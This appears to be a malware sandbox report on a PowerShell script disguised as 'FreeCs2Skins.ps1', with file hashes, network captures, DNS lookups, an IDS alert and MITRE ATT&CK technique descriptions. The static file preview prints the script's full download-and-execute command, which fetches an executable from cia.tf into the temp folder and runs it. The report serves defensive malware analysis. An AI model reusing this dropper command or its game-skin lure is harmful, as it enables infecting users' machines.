Preview:	<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>cia.tf</title>. <meta name="theme-color" content="#000000" />. <meta name="description" content="just a fresh file uploader built for the modern ages ..">. <meta property="og:url" content="https://cia.tf">. <meta property="og:type" content="website">. <meta property="og:title" content="cia.tf">. <meta property="og:description" content="just a fresh file uploader built for the modern ages ..">. <meta property="twitter:domain" content="cia.tf">. <meta property="twitter:url" content="https://cia.tf">. <meta name="twitter:title" content="cia.tf">. <meta name="twitter:description" content="just a fresh file uploader built for the modern ages ..">. <link rel="icon" type="image/x-icon" href="/favicon.ico">. <link rel="stylesheet" href="/styles.css">. <link rel="preconnect" href="https://fonts.googl

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3POJUI906RL1T6UDZTGF.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.7074480723483307
Encrypted:	false
SSDEEP:	48:+kD9jlWotuaCQYa3CyMFU2U7Y6ukvhkvklCywbfCL/dlHJ2SogZoX/CL/dlw2SoR:Vbt33CqT2kvhkvCCtzCL/dbHYCL/dYHU
MD5:	9380634DDEF09DC29164BBD7BD8B9902
SHA1:	C00F7F0F4515F111A7094A1FF4EA275EDE6F4521
SHA-256:	6CDEC3A6ADDD3FA794A3AEEED45EC53A12DD9A7C8165952DCF16E581CCA2249A
SHA-512:	6CFF9FBCD662EE99F80C4C600A443C3ABA7BC971DBDF48A748C6A7238CB0671993356180F3942223CCFA04F2F5C354D7D38C5441629D37A2B7442A6D0DB300C9
Malicious:	false
Preview:	...................................FL..................F.".. ...J.S....7..B?..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....nb*B?..2../B?......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2yY`o...........................^.A.p.p.D.a.t.a...B.V.1.....yY\o..Roaming.@......EW<2yY\o..../.....................U...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2yYYo....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2yYYo....2......................7..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2yYYo....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2yYYo....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2yYbo....u...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.7074480723483307
Encrypted:	false
SSDEEP:	48:+kD9jlWotuaCQYa3CyMFU2U7Y6ukvhkvklCywbfCL/dlHJ2SogZoX/CL/dlw2SoR:Vbt33CqT2kvhkvCCtzCL/dbHYCL/dYHU
MD5:	9380634DDEF09DC29164BBD7BD8B9902
SHA1:	C00F7F0F4515F111A7094A1FF4EA275EDE6F4521
SHA-256:	6CDEC3A6ADDD3FA794A3AEEED45EC53A12DD9A7C8165952DCF16E581CCA2249A
SHA-512:	6CFF9FBCD662EE99F80C4C600A443C3ABA7BC971DBDF48A748C6A7238CB0671993356180F3942223CCFA04F2F5C354D7D38C5441629D37A2B7442A6D0DB300C9
Malicious:	false
Preview:	...................................FL..................F.".. ...J.S....7..B?..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....nb*B?..2../B?......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2yY`o...........................^.A.p.p.D.a.t.a...B.V.1.....yY\o..Roaming.@......EW<2yY\o..../.....................U...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2yYYo....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2yYYo....2......................7..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2yYYo....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2yYYo....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2yYbo....u...........

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4659182473862735
Encrypted:	false
SSDEEP:	6144:DzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:/ZHtBZWOKnMM6bFpZj4
MD5:	D6FA2EECABB035B295AC42C2FD631AD4
SHA1:	B4B26C52D31C9E079744DEED04B80835B5932B03
SHA-256:	618154A9158FA552B24524B103DFE63F6CE240B5B0F7563B70C0DF82444DC2FE
SHA-512:	72F66C31C79D50B460408C424A8098B167C58349AF4937EF1B550E284E867C4221AB2BB1C8D576074A0311A335D31D6F69F36A3266C29DD004F9C2B92B761AC7
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..13B?..............................................................................................................................................................................................................................................................................................................................................>{&.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	5.156553490338682
TrID:
File name:	FreeCs2Skins.ps1
File size:	130 bytes
MD5:	192bc64d6047bbc1b994c00b652ef3b5
SHA1:	349886ab9c80a78f584e2140e4e3bd85f2e717c6
SHA256:	b67ec07f0a31fc36bd7f8ddea36f21fdf53ec44d87b8eae0b42588b1fc963eff
SHA512:	3938e5e665bb6fb368ccf8675c2bb03b5b072657d3e9637e7413cb1abd43bbd4414f65721705e24c938c8469eb3f30896a02cba5c2dd8035f88ffa4344ec1f51
SSDEEP:	3:TTcJRVOELRDPtcGKDlQRj2djTSQqXJAFHBuxH70QEXu1MFH2fxH7Cvn:vShLBuGyQI9dyldgQEXu1MFsdWvn
TLSH:	38C09B31D1280324C91504D574485537F5C7D10DD1553D59C0277D455514D7D0BD6002
File Content Preview:	iwr -Uri "https://cia.tf/1d5ad9c8d3fee874d0feb8bfac220a11.exe" -OutFile "$env:TEMP\file.exe"; Start-Process "$env:TEMP\file.exe"..

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T14:59:09.926351+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49700	172.67.129.178	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 14:59:05.794018030 CET	49699	443	192.168.2.6	172.67.129.178
Nov 25, 2024 14:59:05.794038057 CET	443	49699	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:05.794121981 CET	49699	443	192.168.2.6	172.67.129.178
Nov 25, 2024 14:59:05.806104898 CET	49699	443	192.168.2.6	172.67.129.178
Nov 25, 2024 14:59:05.806122065 CET	443	49699	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:07.072120905 CET	443	49699	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:07.072186947 CET	49699	443	192.168.2.6	172.67.129.178
Nov 25, 2024 14:59:07.097027063 CET	49699	443	192.168.2.6	172.67.129.178
Nov 25, 2024 14:59:07.097043037 CET	443	49699	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:07.097304106 CET	443	49699	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:07.109611034 CET	49699	443	192.168.2.6	172.67.129.178
Nov 25, 2024 14:59:07.151360989 CET	443	49699	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:07.860986948 CET	443	49699	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:07.861053944 CET	443	49699	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:07.861112118 CET	49699	443	192.168.2.6	172.67.129.178
Nov 25, 2024 14:59:07.866344929 CET	49699	443	192.168.2.6	172.67.129.178
Nov 25, 2024 14:59:07.869785070 CET	49700	443	192.168.2.6	172.67.129.178
Nov 25, 2024 14:59:07.869833946 CET	443	49700	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:07.869915962 CET	49700	443	192.168.2.6	172.67.129.178
Nov 25, 2024 14:59:07.870322943 CET	49700	443	192.168.2.6	172.67.129.178
Nov 25, 2024 14:59:07.870337963 CET	443	49700	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:09.129982948 CET	443	49700	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:09.131747961 CET	49700	443	192.168.2.6	172.67.129.178
Nov 25, 2024 14:59:09.131762981 CET	443	49700	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:09.926419973 CET	443	49700	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:09.926549911 CET	443	49700	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:09.926609039 CET	49700	443	192.168.2.6	172.67.129.178
Nov 25, 2024 14:59:09.926629066 CET	443	49700	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:09.926851034 CET	443	49700	172.67.129.178	192.168.2.6
Nov 25, 2024 14:59:09.926901102 CET	49700	443	192.168.2.6	172.67.129.178
Nov 25, 2024 14:59:09.951714993 CET	49700	443	192.168.2.6	172.67.129.178

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 14:59:05.643160105 CET	60893	53	192.168.2.6	1.1.1.1
Nov 25, 2024 14:59:05.781275034 CET	53	60893	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 14:59:05.643160105 CET	192.168.2.6	1.1.1.1	0x1170	Standard query (0)	cia.tf	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 14:59:05.781275034 CET	1.1.1.1	192.168.2.6	0x1170	No error (0)	cia.tf		172.67.129.178	A (IP address)	IN (0x0001)	false
Nov 25, 2024 14:59:05.781275034 CET	1.1.1.1	192.168.2.6	0x1170	No error (0)	cia.tf		104.21.1.182	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cia.tf

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49699	172.67.129.178	443	3300	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 13:59:07 UTC	187	OUT	GET /1d5ad9c8d3fee874d0feb8bfac220a11.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: cia.tf Connection: Keep-Alive
2024-11-25 13:59:07 UTC	797	IN	HTTP/1.1 302 Found Date: Mon, 25 Nov 2024 13:59:07 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 23 Connection: close location: / vary: Accept x-powered-by: Express CF-Cache-Status: BYPASS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SrsoZPIgU28JtOzM9LOwh%2Bbqc%2FGP1qnBa6G%2F244j4YJ1XZxOfjGJilRVIb%2F5AgEzIckYdVfHrsDsZU7T8zroGCeVooZSFQkBvLJH3Eoprhtb2tCJi1GsJqk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e82284efc700f39-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1503&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2809&recv_bytes=801&delivery_rate=1938911&cwnd=249&unsent_bytes=0&cid=d6ae614fcc77126b&ts=802&x=0"
2024-11-25 13:59:07 UTC	23	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f Data Ascii: Found. Redirecting to /

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49700	172.67.129.178	443	3300	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 13:59:09 UTC	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: cia.tf
2024-11-25 13:59:09 UTC	881	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 13:59:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close accept-ranges: bytes Cache-Control: public, max-age=0 last-modified: Thu, 26 Sep 2024 14:36:03 GMT x-powered-by: Express cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KIAgl%2BC%2Fp6%2BYd36X49gZZh55g98a5Ap%2BTt9bXZlS1G3LjTwIwFApdftjq9k2SY%2BiFNCUmF7w3nZiyupdG5ftgQrZnqUSHZwguuSLcpIIrvxW4C%2FTP7j4riA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e82285bccd9c3f5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1520&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2807&recv_bytes=765&delivery_rate=1859872&cwnd=219&unsent_bytes=0&cid=e01d4ac7d2bb1998&ts=802&x=0"
2024-11-25 13:59:09 UTC	488	IN	Data Raw: 38 30 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 63 69 61 2e 74 66 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e Data Ascii: 80e<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>cia.tf</title> <meta name="theme-color" content="#000000" /> <meta name="description" con
2024-11-25 13:59:09 UTC	1369	IN	Data Raw: 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 75 73 74 20 61 20 66 72 65 73 68 20 66 69 6c 65 20 75 70 6c 6f 61 64 65 72 20 62 75 69 6c 74 20 66 6f 72 20 74 68 65 20 6d 6f 64 65 72 6e 20 61 67 65 73 20 f0 9f 92 a3 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 64 6f 6d 61 69 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 63 69 61 2e 74 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 63 69 61 2e 74 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 63 69 61 2e 74 66 22 3e 0a 20 20 20 20 3c Data Ascii: y="og:description" content="just a fresh file uploader built for the modern ages "> <meta property="twitter:domain" content="cia.tf"> <meta property="twitter:url" content="https://cia.tf"> <meta name="twitter:title" content="cia.tf"> <
2024-11-25 13:59:09 UTC	212	IN	Data Raw: 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 62 61 73 68 22 3e 23 2f 62 69 6e 2f 62 61 73 68 3c 2f 61 3e 20 f0 9f 91 80 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 61 64 2e 69 73 2d 68 61 76 69 6e 67 2e 66 75 6e 22 3e 79 65 73 42 61 64 3c 2f 61 3e 20 f0 9f 96 a4 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 71 75 65 74 74 74 65 2e 63 6f 6d 22 3e 44 72 69 66 74 65 72 3c 2f 61 3e 3c 2f 69 3e 0a 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <a href="/bash">#/bin/bash</a> <a href="https://bad.is-having.fun">yesBad</a> <a href="https://coquettte.com">Drifter</a></i> </footer> <script src="/script.js"></script></body></html>
2024-11-25 13:59:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	08:59:02
Start date:	25/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:59:02
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FFD34962EED Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2256543811.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fbb4d797d26fa2df6076b216fdce615bca55f36a8d79c1b3007424994f39c6d
Instruction ID: 0d24cc17591da69c6be4fc5753f940bd88ce2cb3a8d379696034b5eb8a75f8ca
Opcode Fuzzy Hash: 6fbb4d797d26fa2df6076b216fdce615bca55f36a8d79c1b3007424994f39c6d
Instruction Fuzzy Hash: 2041F232B4CA494FEB55EB6894A15B8B7D2EF99220B1840BEC50DCB197CE1DE805C390

Function 00007FFD34962F1A Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2256543811.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75976eef51b183b82637114ebdc20eda26bd31914907dcab12bbd4d0bd2352ff
Instruction ID: dd31ef66a474461b8d916663897941afc92c32a42257f7144f29bdf837b901dc
Opcode Fuzzy Hash: 75976eef51b183b82637114ebdc20eda26bd31914907dcab12bbd4d0bd2352ff
Instruction Fuzzy Hash: 8511E531B4D6854FEB55EB5880A45B877D2EF5A330B5440FEC50DCB097CE2DA845D360

Function 00007FFD348937B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2256235424.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: bf533fd274c58afd781b72c11c81cc6882029034b975418c297449fcca739756
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 5D01677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651D736E882CB45

Non-executed Functions

Function 00007FFD34894E5A Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2256235424.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa6b23b116343dcaf6a0a43f1376fd2e61495e4fee3d87420049573b865347c1
Instruction ID: af8c4263539a5f3e8d9f53fbc07dba5f92f76245d7f7d3ee68a2eecc94e70835
Opcode Fuzzy Hash: aa6b23b116343dcaf6a0a43f1376fd2e61495e4fee3d87420049573b865347c1
Instruction Fuzzy Hash: 7581E913F0D9961FE761A7ACA8B61EA7BE4DF9337570D01B3C5C8CA093ED1868069391

Function 00007FFD34893A32 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2256235424.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e1789dff4d0964f725eac272aa13fac0f69b448e92bde7c9bfe7a13668bbfd2
Instruction ID: 9ae26b27a2ba8843584dc98c191dd7fcefdd57dd452aa37091c866ffafadb029
Opcode Fuzzy Hash: 2e1789dff4d0964f725eac272aa13fac0f69b448e92bde7c9bfe7a13668bbfd2
Instruction Fuzzy Hash: 9391E267B0EFC25FF712472C58B61E53FE0EF572A570900B3C695CA093EA1E2C46A661

Function 00007FFD34896882 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2256235424.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38d76c33fc226de1fe333a941bcc28168a7875a0eca0e15bcba973d2e1e44a38
Instruction ID: c9c0ad3cdfcb913f55688913efa68ebc26dc4a2d59ff4daf6e56922cd7ec289a
Opcode Fuzzy Hash: 38d76c33fc226de1fe333a941bcc28168a7875a0eca0e15bcba973d2e1e44a38
Instruction Fuzzy Hash: 04516C97B0DBD24FE6135B7C58B50E67FA0DF5326531900B7C6D4DA0A3D91C281BA3A2

Function 00007FFD348965F5 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2256235424.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6ea33ca97656343da3cf95d12365158de2567d48e92099bc3dbf091c3a9b78c
Instruction ID: 77053a49742ea8ea3a14e87c62fbf18860bdb2bac3e1bacaf7bb57bb6e1522df
Opcode Fuzzy Hash: e6ea33ca97656343da3cf95d12365158de2567d48e92099bc3dbf091c3a9b78c
Instruction Fuzzy Hash: 2D515E57B0DAD25BE7135BBC68B60E63FE4DF4326970911B3C6C4DA0A3ED1C1807A292

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

